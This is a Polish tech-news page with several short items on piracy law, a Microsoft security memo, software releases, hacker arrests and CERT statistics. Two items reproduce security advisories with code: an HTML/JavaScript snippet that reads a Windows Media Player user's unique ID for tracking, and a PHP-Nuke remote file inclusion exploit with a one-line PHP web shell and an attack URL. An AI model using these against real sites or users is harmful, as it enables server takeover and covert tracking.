Aktualności

Jak wiadomo Ukraina do niedawna była jednym z największych eksporterów płyt kompaktowych najczęściej pirackich do państw Europy, sprzedając od 70 do 100 milionów sztuk rocznie.

Od listopada ubiegłego roku bezskutecznie Ukraiński parlament próbował przyjąć ustawę o zwalczaniu audiopiractwa. Udało się to dopiero teraz, zgodnie z przyjętą w czwartek ustawą, prawo produkowania płyt kompaktowych będą miały tylko te zakłady, które otrzymają licencję specjalnego organu. Przy tym, licencjonowany ma być zarówno eksport, jak i import płyt CD, a także surowców i sprzętu do produkcji. Co najważniejsze, przyjęta ustawa bez ograniczeń, zezwala ma przeprowadzanie kontroli w tych zakładach, jednak pod warunkiem poważnych podejrzeń o naruszeniach. W przypadku złamania prawa właściciel zakładu będzie musiał zapłacić karę przewyższającą o 200% wartość zarekwirowanego towaru.

Bill Gates stawia na bezpieczeństwo swoich produktów. Świadczyć o tym może opublikowany na łamach internetowego magazynu The Register list, wysłany 15 stycznia br. przez samego Billa Gatesa do pracowników Microsoftu. Z publikowanego listu wynika, że wszyscy programiści Microsoftu mają teraz skoncentrować się na zabezpieczeniach programów i poświęcać im więcej uwagi.

„Jeżeli staniemy przed wyborem, czy do jakiegoś programu dodać nowe funkcje, czy też rozwiązywać problemy bezpieczeństwa, wybrać musimy bezpieczeństwo”

Jak twierdzi sam Bill Gates, firma Microsoft chce dążyć do tego, że przetwarzanie danych będzie równie bezpieczne, dostępne i niezawodne jak np. telefonia czy zaopatrzenie w prąd i w wodę. Bezpieczeństwo produktów ma być czynnikiem decydującym o sukcesie lub porażce microsoftowskiej strategii .Net, sprowadzającej się do załatwiania jak największej liczby zakupów i spraw poprzez internet.

Orginalna treść listu wysłanego przez Billa Gatesa do swoich pracowników dostępna jest na łamach magazynu internetowego The Register

Richard Smith odkrył kolejny błąd w Windows Media Player, który pozwala na śledzenie zachowań i poczynań użytkownika przy pomocy cookies.

Błąd ten został nazwany przez samego Smitha jako „SuperCookie” i pomija ważniejsze zabezpieczenia jakie Microsoft wbudował w Internet Explorer 6 w ramach tzw. Platform for Privacy Preferences. Dzięki temu, każdy posiadacz witryny internetowej, może przy pomocy odpowiedniego kodu JavaScript pobierać numer seryjny Windows Media Player z komputera internauty i po nim go rozpoznawać.

<OBJECT classid=”clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95″ ID=WMP WIDTH=1 HEIGHT=1></OBJECT>

<script>
alert(document.WMP.ClientID);
</script>

Tips: W łatwy sposób można zabezpieczyć się przed tzw. śledzeniem. Wystarczy w Windows Media Player przejść do zakładki Tools > Options i odznaczyć opcje: Allow internet sites to uniquely identify your player po czym zatwierdzić zmianę.

Jak donosi serwis Securityfocus odkryta została luka w PHP-Nuke, umożliwiająca wykonywanie komend systemowych oraz uruchamianie jakiegokolwiek kodu PHP.

Luka wykorzystuje dyrektywę odnoszącą się do plików (index.php?file=file) w celu podsunięcia skryptowi adresu url (http://…) do strony, na której znajduje się wcześniej przygotowany kod PHP, który zostanje pobrany i wykonany przez atakowany serwer.

Jako przykład wykorzystany został skrypt PHP wykonujący dowolne polecenie shella (należy go umieścić na wcześniej przygotowanym koncie www):

<?php system($cmd); ?>

Aby wykonać na atakowanym serwerze polecenie „ls -al” z wykorzystaniem powyższego skryptu należy podać adres w następującej formie:

http://atakowany.serwis/index.php?
file=http://adres.przygotowanego.skryptu.php/skrypt.php&cmd=ls%20-al

Inne eksploity można tworzyć postępując analogicznie.

Tekst źródłowy i więcej informacji znajduje się pod adresem:

www.securityfocus.com/archive/1/250777

Już w najbliższą sobote, bo 19 stycznia, odbędą się kolejne wykłady krakowskiej Linux Akademii. Standardowo start o godzinie 17:00 w Akademii Ekonomicznej w Krakowie, ul. Rakowicka 27, Pawilon Sportowy, sala 9. Wykłady poprowadzi Krzysztof Leszczyński, który opowie o TeXu.

Podczas festiwalu filmowego Sundance Film Festival, reżyser Brian Flemmingm który brał udział w badaniach nad okolicznościami zamachu na Johna F. Kennedy’ego, przedstawił film pt. „Nothing So Strange” który przedstawia udany zamach na Billa Gatesa – prezesa Microsoftu.

Producent filmu – Brian Clark stwierdził, że film ten jest fikcją i nie jest zwrócony przeciwko Gatesowi. Do scenariusza potrzebna była po prostu jakaś znana postać a Bill Gates właśnie jest jedną z tych osób.

Fabuła filmu odbiła się szerokim echem nie tylko na festiwalu ale takżę w internecie, gdzie zabójstwo prezesa Microsoftu stało się główną osią kampanii marketingowej, do której należy m.in. witryna www.billgatesisdead.com.

Dostępna jest najnowsza wersja serwera pocztowego Sendmail 8.12.2. W nowej wersji, w porównaniu do poprzedniej (8.12.1), poprawiono działanie procesów potomnych i naprawiono problemy związane z funkcja setgid(), stat(), co poprawiło współprace z innymi systemami. Oprócz tego dodano nowy port dla HP MPE-ix.

Najnowszy pakiet Sendmail do pobrania stąd, natomiast pełna lista zmian znajduje się tutaj

Od kilku miesięcy, grupa młodych hakerów z Włoch, terroryzowała zarządców sieci na całym świecie. Łamali zabezpieczenia informatyczne firm oraz organizacji. W czasie spotkania G-8 w Genui, oprócz włamania się na strony internetowe instytucji rządowych 62 państw, dostali się do systemu komputerowego Pentagonu, amerykańskiego NASA, włoskiego Senatu, a takżę potrafili zaatakować komputery sądów i uniwersytetów w różnych krajach.

Dzisiejszego dnia Agentom Gwardii Finansowej udało się ustalić nazwiska szóstki młodych Włochów, którzy od miesięcy paraliżowali komputery w kilkudziesięciu państwach świata. Młodzi hakerzy zostali namierzeni przez policję i złożono na nich doniesienie w prokuraturze. Mają oni od 15 do 23 lat. Za przestępstwa informatyczne grozi we Włoszech kara nawet do 5 lat więzienia.

Jak wynika z opublikowanego raportu CERT, w roku 2001 wzrosła o ponad 100% liczba włamań do komputerów, rozprzestrzeniających się wirusów oraz innych niebezpiecznych zdarzeń m.in. odkrycie poważnych błędów w oprogramowaniu oraz włamania na strony internetowe.

Zdaniem ekspertów, prawdziwa liczba niebezpiecznych zdarzeń może być znacznie wyższa, ponieważ wiele zaatakowanych czy zawirusowanych firm nie informuje o tym opinii publicznej.

Raport CERT/CC Statistics 1988-2001

Telekomunikacja Polska SA oraz Energis Polska Sp. z o.o. podpisały umowę regulującą zasady wzajemnej współpracy w zakresie świadczenia usługi komutowanego dostępu do internetu.

W umowie ustalono warunki połączenia sieci w celu świadczenia usług, uzgodniono warunki i zasady rozliczeń oraz zasady współkorzystania z infrastruktury telekomunikacyjnej. Strony rozpoczną świadczenie usług z chwilą uruchomienia 20 punktów styku sieci zlokalizowanych w 12 strefach numeracyjnych (bydgoska, gdańska, warszawska, olsztyńska, rzeszowska, wrocławska, katowicka, krakowska, szczecińska, łódzka, lubelska i poznańska). Do końca 2002 r. Energis Polska przygotuje do uruchomienia dalszych 10 punktów styku sieci zlokalizowanych w innych strefach numeracyjnych. Każda ze Stron zobowiązała się do stałego unowocześniania swoich sieci i poprawy jakości świadczonych usług telekomunikacyjnych.